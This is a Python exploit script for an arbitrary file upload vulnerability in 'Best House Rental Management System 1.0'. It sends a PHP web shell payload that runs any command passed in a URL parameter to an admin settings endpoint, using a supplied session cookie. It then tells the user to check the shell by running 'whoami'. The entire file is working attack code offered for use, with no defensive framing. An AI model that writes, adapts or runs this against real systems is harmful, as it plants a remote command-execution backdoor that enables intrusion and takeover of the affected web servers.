import requests
import sys

if len(sys.argv) != 4:
    print("Usage: python exploit_house_rental.py <target_url> <file_upload_path> <session_cookie>")
    sys.exit(1)

target_url = sys.argv[1]  # e.g., http://<target-site>/rental/admin_class.php?view=save_settings
upload_path = sys.argv[2]  # The path where the file should be uploaded
session_cookie = {"Cookie": sys.argv[3]}  # e.g., SESSION_ID=your_session_cookie

print("""
Developed by Vidura Ranathunga
====================================================================
[!] Exploiting Best House Rental Management System 1.0 - Arbitrary File Upload Vulnerability
====================================================================
""")

# Malicious PHP payload (web shell)
shell_payload = '<?php system($_GET["cmd"]); ?>'

def upload_shell(url, upload_path, session_cookie, payload):
    files = {
        'file': ('shell.php', payload, 'application/x-php')
    }

    try:
        response = requests.post(url, files=files, cookies=session_cookie)
        print("Response Status Code:", response.status_code)
        print("Response Text:", response.text)

        if response.status_code == 200:
            print(f"Exploit may have been successful. Check your shell at {upload_path}/shell.php?cmd=whoami")
        else:
            print(f"Exploit failed with status code: {response.status_code}")
    
    except Exception as e:
        print("An error occurred:", e)

if __name__ == "__main__":
    print(f"""
    ============================================================
                      [!] House Rental Exploit
    -----------------------------------------------------------
    [*] Target URL: {target_url}
    [*] Upload Path: {upload_path}
    [*] Session Cookie: {session_cookie}
    """)

    upload_shell(target_url, upload_path, session_cookie, shell_payload)